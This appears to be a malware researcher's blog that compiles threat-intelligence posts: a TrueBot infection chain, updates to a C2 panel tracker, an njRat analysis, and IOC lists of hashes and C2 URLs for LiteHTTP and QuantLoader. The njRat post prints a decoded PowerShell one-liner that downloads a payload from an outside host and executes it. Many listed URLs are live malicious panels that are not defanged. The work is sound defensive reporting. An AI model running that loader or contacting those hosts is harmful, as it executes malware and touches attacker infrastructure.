I have compiled a list of IOC’s denoting the infection chain and some notes related to it.

It starts with some JavaScript files. 4 of them have been identified and pointing to same TrueBot C2 ultimately.

At time of writing this, they all had low detection on VT, with 2 out of 59 engines falling them as malicious.

MD5
71e7a2549311647a6178b84393700bf8
4c75c5f63418b48ede30c16b079f324a
3c57867dc4bdeb8a7d55dfb7d8ef5008
287b172c23da5426cf039ef55d959fbd

As per comment from @thor_scanner on VT. These files are from an unknown Javascript obfuscator and first noticed in February 23 by the @malwrhunterteam on Twitter.

See the comment here

See: Tweet Here

These files are heavily obfuscated Javascript file, that I didnt waste time on trying to deobfuscate. I trusted the sandbox execution on VT to further correlate.

They all called out to a url on the following IP: 62[.]204[.]41[.]69. The Url in question is : hxxp://62[.]204[.]41[.]69/dll[.]png

WGET on this url retrieves a file, that was not recognized as an image of PNG format. The MD5 of the file was: 8245ac0319d4b55dd29a13e20fc5db35

This script as show above in the HTTP response of the screenshot, gave us another interesting url : hxxp://62[.]204[.]41[.]69/ldn[.]dll

Which served a another payload in the form of a dll with MD5 hash: f52363b6cf282669e5fcc5537b5c3451

This one is Truebot. It is a signed code file and loaded the previously mentionned script.

That Truebot sample calls out to domain: droogggdhfhf[.]com which is hosted on the following IP: 92[.]118[.]36[.]236 but the server doesnt seem to respond at the moment.

Further to this, the IP serving the payload: 62[.]204[.]41[.]69 is host to ModernLoader C2 Panel at hxxp://62[.]204[.]41[.]69/AVA/

IOCs:

Javascript MD5 Hash:

71e7a2549311647a6178b84393700bf8
4c75c5f63418b48ede30c16b079f324a
3c57867dc4bdeb8a7d55dfb7d8ef5008
287b172c23da5426cf039ef55d959fbd

Fake PNG MD5 Hash:

8245ac0319d4b55dd29a13e20fc5db35

Truebot DLL payload MD5 Hash:

f52363b6cf282669e5fcc5537b5c3451

ModernLoader IP:

62[.]204[.]41[.]69.

ModernLoader URL:

hxxp://62[.]204[.]41[.]69/dll[.]png

Truebot Callout C2 Domain:

droogggdhfhf[.]com

Truebot C2 IP:

92[.]118[.]36[.]236

A new year celebration is not complete without a recap of the previous year. So here it is, graphics and compilation of what was seen by the C2 tracker in 2022.

A total of 979 Live C2 panels were registered in the tracker from January to December 2022. The panels were spread across 56 malware families. Some big malware name left the trakcer while new families made it in.

TOP10 of malware names

TOP10 Hosting Country

Top10 Hosting IP addresses

TOP10 Hostnames

Today, I got some time to makes some changes on the tracker side of the website. I added some new elements on the stats page, some new download options, and a clickable malware name that renders pivoting easier for a given malware family.

First Off, the stats page now shows 2 new elements:

Last 30 days Top 10 malware family for panels seen in the tracker.

It also displays last 30 days in the form of an histogram, for numbers of panel added daily.

Malware Name now clickable

The malware name on the page of the tracker is now clickable. This will generate a url for a specific family, with all entries for said family.

2 new download options

As the data count grows, I received some request to have a more digestable download options.

I added 2 new options:

• Download last 30 days of panels in CSV
• Download last 50 panels in CSV

The bulk dump download option still exists.

New design for the blog

As you may have noticed, I redesigned the blog template to a basic design in same color tone.

Now in ThreatFox by Abuse.ch

Abuse.ch who does a wonderful job of providing multiple platforms to fight cybercrime and allow easy sharing of IOC, as now started to ingest Viriback Tracker data:

See: https://threatfox.abuse.ch/browse/tag/ViriBack/

Hovering with the mouse cursor over a specific C2 panel login page will provide a screenshot of the page when added to the crawler. This feature is powered by URLScan.io

Whenever I add a new panel url to the tracker , it will also be added to URLScan for crawling. Furthermore, clicking on the panel url will open a new window to the URLScan report.

Proper tags will be added to the submission on URLScan for better clustering.

I hear good news and new features are coming to URLScan that will leverage tags and similarity between submissions.

Here is an example provided by the tracker: PredatorTheThief

So far the number distince malware families is : 43

Here is a pie chart of the Top 10 families I have seen live and recorded:

The worlwide geographical distribution of the IP addresses is similar to the first month of recording, however, Russia is far more colored this time.

These are the top 15 ips seen :

Here is a Top 13 distribution according to respective ASN:

I was on my cell phone in a waiting room when @scumbots tweeted that it had found an njRat instance on the paste myXAXSKh.

As you can see in the screenshot this looks like char codes separated by a caret, but not quite the MZ magic bytes… so I was curious, and was trying to use CyberChef from my cell phone with only the first few chars, and it never returned an MZ header. Anyhow, as much as Cyberchef is a great tool, using it on a cell phone was not ok.

When I got home, I tried the code in CyberChef using this recipe:

So It changed the following text from the Paste:

57^77^42^42^41^48^41^41^63^41^42^45^…

to :

[AppDomain]::CurrentDomain.Load([Convert]::
Frombase64String((New-Object
System.Net.WebClient).Downloadstring
('http://www.asmreekasounds.com/upfiles/up_down/5de74b4422b036f72bec452a21974406.mp3')))
.EntryPoint.invoke($null,$null)

Not quite was I was expecting. Most of the time, miscreants are lazy and will just simply Base64 their payload into a Paste, or into a simple script that they download, and then decode the base64 to a exe.

Nevertheless, this was still interesting, it was downloading a file with an MP3 extension to decode from Base64, I had to check what was the content of that file, so I downloaded with wget, and sure thing It contained base64 code, that once decoded would output an EXE file with MD5: d2635eea6c889ee9f341e3acaf92c152 .

A quick look into VT shows its detection and what seems to be a common threat name “Bladabindi” which is AKA njRat.

I always have a look for opendir, and this folder was indeed the case. An open directory with tons of MP3…or malware should I say.

This seemed liked a legit website with an upload feature being abused.

Quick translation seems to show that you can only upload files with the following extensions: “.rar, .mp3, .wav, .wma”, but does not seem to check for content type, and this would make it an Unrestricted file upload vulnerability according to OWASP.

Further researching the uploaded files, I soon discovered there was more of those base64 disguised in mp3 payload. I downloaded them all and found all types of text.

I found some Triple Base64 Executable, some double, some base64 with specific chars replaced, decimal encoded executables, some executables disguised in Hex after being base64 etc… you see the pattern, lots of layers of encoding. Nothing some regex and python cant handle.

In the end, I discovered 121 Exe’s, out of those, only 17 were already on Virustotal. There is more then encoded Exe, like PHP script, powershell etc…

Needless to say that I uploaded all the files to VT. Here is the list of MD5 for those discovered exe:

0106229044bc169c34921d8e7dbba9c9
03e35aa252a9812ba83cd8710799bc54
06676e2cbddc93ca759c2d4d270ae8d3
067f398e883b2da133977a796c5e94c3
077564f81c311d37f27424c058b130a6
09c0839607878047a8f57b293d9cc933
0e7b90c3c68e3cbbfbcbf55d54e99b7e
10456c5073b56e2ca51966a18a39054a
17a6709047f8295ec2d494fafcefd21d
1e1e89ec23f1757010376f9a89c3361e
1ea820ddbb58bdab0bdb3b0ac1d91ecc
1ec4af14368aaf8e419861147d39a2fe
1fafdb34be9427c0a3212dec8c0b74ae
2363f4f010e50498ffd2a66239e02a17
2447cad2bfc81354dedb022c382bd76e
2814bb696538e341c96a549e82c87857
287ccf62cf6cfe640408bc26c022b2e4
2999404c7f69dfa008e3300e772bd43b
33628565d4ba2eb203330721470d5868
34c0bf7fcf67cf5918a40a3861f7109f
35090d34410e61c38281173a83b2ef39
37ce57c74b8b00bf0149d4d65a9c80e9
386e412b57afd2a1ad321932bbbc78d5
3b0052bdb59e70ab6eb96f33c533c687
3bc03d5287d125e8fcb586b13cff98e1
3c0d927634e09d80dae0335b8e9b9b19
3dba585b7828876b6af95599b9802333
3e90879fccc0a341f984362ea2197744
3ea1a8e3b8ec71c4bf4c516958eb255d
3f98be3634b88ae1fcc042b42d040e89
419a5bfa469eb4504c36539f944ea828
41d952b79efad76860b0d91d20b425b4
42e101194909f63a1205d698477e3e0b
453b3fa00531cb58ef304e639680c71c
46eaaa7f3bfe65fd921e1555d87a1459
4735979583822605c13e8d42fb566b00
4aa9ca82a100c2e692b9ca257b1b9380
4b297d0c1d25ae7117bf65b4b53cc1a8
4cf5fd7a8f5a6bec069196daf7862ee3
5066ea87129db329aeffd4594cb6dbc4
5146a9828c4c95482bcffa9a62f6ad73
51e8719c7a03bfb448b33ce74df137d6
53272041964d3e2b680942074234188b
54cb91395cdaad9d47882533c21fc0e9
56bcac797486a2f2841083659b1668f8
573d1a7a5a4a7c5e6c78522740a4b5c4
57ef3704f5eb3e93fb58e483d9fe9cda
5bf7e0e00dd8d17c6ff8eb9ac4f0a01a
5db37525e8469100e3f19a2d2dfab2ff
602bea50a2dae0b33c592e36f0493ac5
62213f9d5c8841b6f5b8afd9bdc28ee0
625c3173bc62fe93942412fa4b0fb696
6411118dc5160de54ec10f5dda7002a6
64598f18e353f9c56eee5e1d30f76439
6afa7e02e03588692c62bfeeed86a67d
6e6b9dbfadb310faaa64867204d76f82
7372785adcc4556884d6442ffe3fe782
792f6cbf046b1dd0277b864598027bbc
79d405b85ca8a9960f49836088156844
7e9a7b8cc341a3e5c84410df0e39e647
8071ab417eb062de88fcdc722c09ec83
80c0ede0107eb91ce270457403809dd1
81a33185d99ad999b09b0506dd4fe0ee
82e094d6343e52f38df9203dd0db3bed
83de198861917b25cf676597189fcd1e
877f13b2fe1e60af8efaf0b28aa7d8b2
88677560b99ffe660b25b95d7b7dae7d
8962cd09b754dbfae1c7d88da193265a
89a0efbbe93b9928f379986f022634b6
8ab1876322022153188fb02fd73f72ae
8c1d054e75c05478e8c4a822cad4f8f7
9018a001dea96cac92d931bd48fce801
929e9d4545e63d0c33584d38ad53d658
9869c642c417173985e411a2f178d461
9ccb0d0071c02a8404b148acf9c534fc
9e6446b087bdaf822df230fd8eb1b715
9e99a0305141893a850bd0c89004439b
a1616d68ec4a0ca966a15c32c14426c3
a19257e8655754ded9adc4cf201707c8
a5762ded8111aa232a8ffb1de31f2e90
acb4e54e54a57d6b1404e10c2d4b4477
afa769806da434adaf76da9f5cf245f3
b1909a9479db3963822a133399cf4731
b334910ad32f2dd093174434afdf7dce
b55f7ac283c497162e51bd33bd61688c
b560c1bdc7dca63f41a4eb90eb3657e8
b7174917c43da704e4a2131d656a9221
b7f2b7541f365d78889b9fe3a81e0bad
bb2b5b5d34172c40c37f13a14a0089bd
bb5b47697a955332a1b3bd0fd00b0284
bf6c2e81172691cbb264142e29817b6e
c14820b567bd99399202226d6aa2b4bf
c3c7ca020f0631db2ddcfba49cef4ae2
c43346b3584a9c055463d1198800335f
c7a0479e8d351372bd93ca9c1f391320
c9c343ebcadf0cd3209c409bbb6ebb8d
cbeaa6f8ff679285822bde1b52c5e62f
cd542627ab037e6ea592af28d28f2dbb
ce9dc231fde6a489e9df5f5b243800d3
d2635eea6c889ee9f341e3acaf92c152
d31ce02c04935d0642d5aab3c0ff371b
d4b4f71454281f2d8a63c41feef8be35
d6c0f4057b6a588bfa59aeb7df78b0f8
d75ea59fef6a9ff58a5cc69e16550d8b
dc32a95818b45896a6ec11b1f56d4bfb
dd15159f4aa512aeae592bc465107693
dd37d79acd770c57d13e4b15bcecfd1f
e232d1b59457269f5cdaabe22141a6a1
e3338bfce074d7dbe23eba4e15043840
e5adf6a554abf5c9f1694265d0809ff0
e71904d8399cd94183bfacfb40e5cdfa
e8cac085008f267529f1f43186d1ab4e
efe3204a944124613ee02d68e6423399
f42365ec2627b872e1624d252991bb59
f5cc7602c09212ca86bb50576a02604e
f615272245fbf6770271fb4eca791b4d
f96329cb2ce6550ab40a2673f49a3e76
f986fb700c232cf44f429b5cf5cc56e2
fbc2273f5f3099445508c95a936da8cc
fcb97d4d2b8fa0cc7a156aa2b39db5d6
fe8da6b7adb9834bf20877b3e8b1c1fe

The following Zip (MD5: 98bc4db3c23b6d45326251ec6f2d3941) contains all 121 files.

I added a Malware C2 Panels tracker on the blog. It can be located at http://tracker.viriback.com

A search feature in the header is available to search for a specific malware family, or search part of a url.

You can also dump the entire data in csv format.

I might do a stats page, but I am currenlty building the data set before I play with graphs.

If you have corections, requests or suggestions do not hesitate to reach to me on Twitter: @viriback

Same goes if you would like to contribute, twitter is the best way to share 😉

One particular instance of a control panel was seen repeatedly in my research on virustotal. Multiple samples were seen for the first time in May on the platform. They were calling out to : hxxp://topksa[.]net/Panel/page[.]php

The panel of those samples was : hxxp://topksa[.]net/Panel/login/

A total of 106 LiteHTTP malware samples were seen from May 2nd, 2018 to May 20th, 2018. The panel is still live at moment of writing this but sightings of new samples on VT has stopped since May 20th, 2018.

I also saw some other LiteHTTP panels that have been active since the 1st of April 2018, which the IOCs will be listed below:

http://topksa.net/Panel/login/
topksa.net
212.237.55.178
79dae4a5b199281f924722be1f3ca1ce
67615ff09fb36efbdb2b37bb7a594d88
7747340fe0465e80910abdaa202abfe5
a39733bbaf88069e793f3f6b4937b545
5268dfbcc1b98498480cf648d52cf5c6
042b604594887802b08e4d79f29d1eb6
0523a8c5c9e3e31a2ad32f6c77b1447b
067abd137f315170fee9c1a1ece78df7
0975201adbdc0331e24b43b9d40ea520
520e7563015cf54d0b8bf003025bb56b
589e9608e2ee2852e145e3470fd0d7e6
643f27afbddb0ee532720c54cc0abd18
64f2d05dfe9a5760594a6c6439b63100
6c1d8b229bb02ee9ab3562fa8c268534
733be540fd11365c3b2b8bd38914f8a0
741d1f46b2b2d253b3dcd66f9f39485a
7f0909ead4bd5d8f471e9f4f5b5d89c1
9720c546cd771d3440aa14cb2c17df84
99d0c5262e99cd6b43eb33438399e016
bb293f81679dcbd098102fe707902377
ccbd0192a391ec97bbaa6778285a22b4
ce8e383c7c315ee27a4a2c53d494ff33
ecc9511440e1cadb2864f4b757eb52bf
eee5d8ba1c06afaaa5a0d1563cf9e2db
49f56083538e4f0aa43873781132bd61
500d9aaaa485b73610c3aec1fa686a3b
63fe05d7b1951fd4660dd1857430796b
768a0e0e27749d94ea4675abe4de1a8d
bbf5f31d7a41d45cc68e667471c63871
c2a5ab21a6e2a349fd173337cd1e0a48
d3d83a8a744cb862ec67eb771d9d984a
dfe58df1e543c014ac1b166402fd0e2a
23f4c86f255d2cd1c85962d6552520fc
306c76bb087b95ceae7a7399a2e41f4e
3c84d0927a75e75b28ff4553a192b5e2
418e32f2188ce2a38d1dbbf1ef05efeb
490e10e390ae6995e83d4e49cb10cea4
4e50a38741609c418ef2884f62e0d4af
4f901b87e938ba01516313c71e6dc8a5
7c86374250574fc13eaa2efb3fd9a786
aa1cbbf73b761585ee0353bf8f40461b
e8084007d595879f52f05f9083175d3f
f398d68d59cfc3a1a3415649f8324e6b
1696e4b5342fa4f1721767ec5e7f5cdc
1a1fcd0e1b661b4ecc160a7772b4f46a
2361397d688312d862efad87d1c0a525
50de216e6a3f99abc33b025a2d8acb41
65964e1d3841ea26e9552a57f0a8d37d
65d808967ca7b7ba87d2d1ae9b268f77
67d85a9af46ac0e4052f647561e45012
70eedafb7494b27ff94781c2245d7624
834e5453349b71d21783e475509f46e3
881618eeffece7fea5bba2fc3e589cca
b5803930438bd2578b0983cca7dcb08b
bd7098ecac3678c98e9907086576292d
c30afb3577826654aea95810a0e87dec
dccecbd3baf3fc2e451b54bb392b01eb
dd94c70d4a53ee04a7a1c25c48ac2f70
e1f2104ea54aed9a7eedc954d24c2b6d
e256c4d3b44c55b040e7576121b15ee3
fac365dc7c1588ff054094481e33633d
48f9633d03cbe781f65c76087844e2e9
19b5c9f833ed1dd0b68df970a765d0f5
2d4f85618adb4b1576a6414cb37db449
45e5864c3a69fbb9ee3a11b6b3c26f7c
977cbdd6b7e8623465e35176085dc17d
9aa3bd406b254181d1a16d6d280d7490
a2d955231b610626fc68510722cb27fc
de80e2b7f87438e4f39414a94083c954
e47313dbfac4934a866069d2c2c1a305
21c7805d4227866332fc25425981b360
6ebff77cfc1ab21e02d604a12ab416b4
063b7db270c03c58316d6d1f17be55e6
0be1d348eeceecff5817fe5c513e9172
1989abbcef413c2473d71c5d868b649f
3f54cc5d47fff7cf7735b0f30afa5707
423fd2489703f155640ce488cc776e8f
43db1aa9e2574c84f09d087efec21bc2
4fcf013cda3586e3dda973cab9b5eff4
629ae5236ebaec9452ff4ad47daa2d10
634a92c9b1c2beb584965d15222f01aa
666819caa468e2fa24f0107a3d076700
6da563bef78ba94647915ae795278b42
6fa88e08a3055282fd4e78a483821a0b
7ebf7da0d048ce95514359644bbf1db8
9b92e55cba936c390a62ff8b00b57326
9c84f43ff72aff262a0fd34e26e5c811
9d523a63c28d34afdbe80b7f0e080d08
a3508b09f61b15d86e6a1659f3e4f05c
a5eb787d733fc39a0375bf176f11a9a4
a723f616e0ae03c4a9e198d04b4d8bd6
b0358707ddfde044c4944396d2c7c29b
c5bae65408bf00f89428fc2d200d9c48
cfd77b5405814fa9022affc48c76a420
da8976c966de36eb1b177a41093406c5
e110d1db461441607c21c18cd42ba82c
e1c375876659407ed7452504839ad6c0
f27f3222353280e52793a7130e41f5c5
fe1759f0600e3221d6323ee2ac5c9ace
38b789e9fba006ead95c9d8a9def44bb
b3a6ec4f4a4889ecd245a75458268646
ec03d66b68304502b36aa765497cbd18
26d95659c646f88d2b14dc71e2bc07b2
5f8b7d6cae04ff17bcf7186bbf8b30d7
dc3fa09bc67a9ca0f2aae55e0af4184a
ed1b204cd1e6850c43b814bb96e94097

http://103.194.170.51/Panel/login/
adeaada185fa73cd8b779869e10cbe91

http://172.81.133.27//lite/login/
d91ad16e2e3c57dba48dfffe315e715c
cff1ab09d5d582086588882e5fdf1696

http://176.223.131.228/Panel/login/
18ada7caf0478dda9ca3b62dcef66c6b
775cdac7ee3daa4fa462431b7f51998b
b49e2dcb3aef79d61a9832d1903d101e
cf992f2fc1c2ad4b8f5ad5a9410cc50f

http://62.77.155.65/Panel/login/
5691ab6b01e9092578d4f3e0199a1583

http://babycute.thats.im/sociu/login/
0c163243ba933d4b14a7673a9c561795

http://bananaloop.ru/Panel/login/
987d46def142dc455f32e3c8ea052edb
f3e02148b8f4dccf131fd24667e2f8dd

http://k9stock.com/Panel/login/
671d6ad1db0e32d2626f1de297f08471

http://partnerwithuss.ru//Panel/login/
39c5fb2236aac6d5a672155ba174a028

http://posalive.su/login/
2615eabfac63bc5ff0418ca7edf10092

http://razilov06.hldns.ru/panel/login/
543f8a019a3f886afdf3b3b4efc7a312

http://sketchie.ru/HTTP/ZzZz/login/
a3e211615cddff693f73bfab8317fcdc

http://tik-media.info//login/
bc9f581a808576eabe09c19a09737ff1

http://x420.me/latte/login/
7f170a002757bd3c1f6fcdd61e750944
7c0176ede8e8920b559eb7c7a7cd72d5
d3ab4462ace2bd0ad62a9adec5b47516
789388866ccb7b45d79d5e1b827211ac

http://xanull.phy.sx/Panel/login/
f5549ac23c7e934efe149cd63c3ed7b5
6e3050622a038866506890c1c94224eb
5d1ebb7a2a459467cfcbf87acfd3c4ca

http://yylisah0.beget.tech/images/thumbs/about/informio/login/
0494ef09f44c8646a3ebf79baad93417

While there is no novelty to this article, it is more a compilation of my observation on QuantLoader activities for the last 6 months approximatly and a collection of IOCs.

During that period I observed 25 different C2 web panels of QuantLoader. Some have been up not even for 24hrs while one has been up for almost half a year.

My methodology is simple, I look at submissions on virustotal after searching for specific queries. Searching for specififc queries permits to narrow down the submission to target families of malware. This is far from perfect as I could miss a few activities of certain family but seems to work relatively well.

Here is the list of observed panels with their first seen date, last seen date and numbers of days being up:

Here is the dump of IOCs group by C2 panel urls:

http://195.22.127.170/q/admin/
195.22.127.170
eae17082ded2153c4b9c7dc7ad7f6b7e

http://aleaha.info/q/admin/
aleaha.info
94.154.14.150
a412294a2d5bc43e929d4be7f679b956
35d727cf1e8dfc74d81043536f458840

http://apple-shop.tech/Gtf7xfRd3bnj/admin/
apple-shop.tech
37.1.201.91
8b6f7b420072d95e8da65df7f4aa1b5d

http://bima.website/admin/
bima.website
185.241.55.242
3a2534afc6e50555e18d34030a356f94

http://cynagotceter.in/q2/admin/
cynagotceter.in
49.51.230.174
e6bbc52ff5f1ca8d5a705e16db96797d
8bbffeabfce5932a31349333c3b13929
1350d30aa6e02baa48af3411646d55e5

http://dackdack.online/api2/admin/
dackdack.online
104.168.140.87
45.79.218.235
206.189.77.19
431c3a0f52955313121038dcc8b8f021
ca9d18db1dfc3ad5a52402525ce0e52b
04ce2ca848782de8278340787af03e6b
e282e93caffd4affd50096bb4f009b31
ceb24f0dfd5867c59c292cd6eef9d4dd

http://dada.grantflaskparty.com/admin/
dada.grantflaskparty.com
185.148.147.152
bdb58831b33c3d3009490d16ff520386
734d0a1cf0c233f1a30865c6c5a2d9b3
3f7625566c2f3a35acfd7a14642e1bbd
21cbba5bda95d96313881378d250f08e
013f456bac4268047d917236a2ff262f
e996e9b252991d87e6908bb3beddb393

http://dandiesinoz.com/scripts/backup/admin/
dandiesinoz.com
116.0.23.244
a22c6aa5c0c470f2130720d0a1a4ad7c

http://data.michaelorth.eu/q/admin/
data.michaelorth.eu
194.58.119.193
32ee820b1a32b23ad95cbff42790821a
ac8de3d1d37e9cea76deb8bea8149f65
c140241e3d820d7bd9a132c5f83e99bf
10e8ea5b0391319f5a2794cd0f634624
456c88705ef023d28327f7d1a86b81f3
2eef86c9a85199249ecc5a867fd86390
a384f4f75c88de6dd7f8533a5c400843
9b29ab7418e2d09893b9c0c66760b554
03175a6b6691964c2ed1bf123fb2d0ba
4030b46d23eb1f00abb09d8c42f18a0c
269870263ec4e37684da241752f4b5d7
9bab405d34afa66fba19ec044dee3174
8df4e1260345f6d54d1963b95820deda
3316d264fa5a13cf6cf8ce6a71b0055d
22502e23ca6970cb0571b56f69c37a65
1e0ed91b51897400a4ca65b35f6ded5b
913a742cf8f822e36702b728688aa692
79536b1ecd2e4b91ac771553f74fefe1
b663605f5ee5934f2adc45d768ac80ff
1d84da6610ac43dc7112168fb406fb22
1cc936f7c244ea822178b5a3c4ff3c7c
90e31c2c541294836c227f8daa19125a
58d3799f25096d766eda4f28066a93a9
b41d1d1c60ca99c85906ca75a0ff3fa5
10c02a83ac93a708b2c631b7fa5a559b
1a22573774c891fc4f86a99f45dbc809
64ff0ccf4a668c683ff3715116267c41
467f40798700f10e8cbd9d482ad4dc9a
b32803bfe5626409995a1300de76a700
34a3e10080caefd4787334d2d438249b
11912cd4ce45e06c1559802b66a77489
58ef78d8b51caeb750ab10fd56197f79

http://dnspod.pro/pro/admin/
dnspod.pro
185.117.119.29
588eace9102a9f67ef2a1f24322cc5b0

http://fortresmuch.com/q2/admin/
fortresmuch.com
119.28.111.49
cf8165ddc1ce44835cb57ec226c08c4d
07da5d3088a13d4db7d5300e84b11ca4

http://heroskatopirango.com/391f4jda9s/a/admin/
heroskatopirango.com
204.155.30.106
0942974fbe31b4be3e12dd6d65f85478

http://javelinkay.club/reader/admin/
javelinkay.club
49.51.135.204
6955ed0b43b3a5d33a1d9daf1f482923

http://login.americapsolutions.com/q/admin/
login.americapsolutions.com
194.58.119.193
595eaef63066c95296fad6f0fe9ee41a

http://mts2015stm.myjino.ru/q/admin/
mts2015stm.myjino.ru
81.177.135.151
88a0c0fcee3e8f46766dd25ce70c11b9
47bb80b54e11d0ce1dc3179b46414cac

http://myyu.ru/q/admin/
myyu.ru
95.46.114.96
a263ad4e55c797fa551ca9f9c576ff48
ab87aa8d0818c6c9f99794f6c93f6d36

http://newdawncheat.club/q/admin/
newdawncheat.club
191.101.245.36
0d0838e8c347d6f71c48bd3316cb0103

http://rec-tube.date/carting/admin/
rec-tube.date
191.101.245.46
ce9c9edab5b8fc2905e90613a092a808

http://rolwiluld.win/q/admin/
rolwiluld.win
194.1.236.115
dc3cb327730bd9ce48c6303bcb768b9c
d54b25a98667215ae3958160f3ebd76d
186b0653e11b870bdd173d8fa0d214ca
e1468b0743822bed071274f0d2e7384f

http://serolotb.com/q/admin/
serolotb.com
185.117.75.92
0370e27514bfd6282b5708b5b01b893d

http://tytoldran.win/q/admin/
tytoldran.win
194.1.236.115
ed6f9b51cd3dd3d5cf2a9011c67b204b
4fcab10c59be02cc0a50e2c280247ff0
432b18e36bfd91dad68edfba581ef3ed
0d1ce7055e828bbedd5be16e75841fed

http://warpje.xyz/quant/admin/
warpje.xyz
37.97.183.120
438b06bfd279e7430d3a9a62246c93a6

http://wassronledorhad.in/q2/admin/
wassronledorhad.in
45.32.236.220
e6e2025afee1679005a94438c924f58c

http://windowsreport.stream/q/admin/
windowsreport.stream
104.24.114.159
c639b0b9ee0407051fc656a28f2b0e97
98b94529813f27aafce8818b49288397
54e6ab371b04161963c793796d90bc37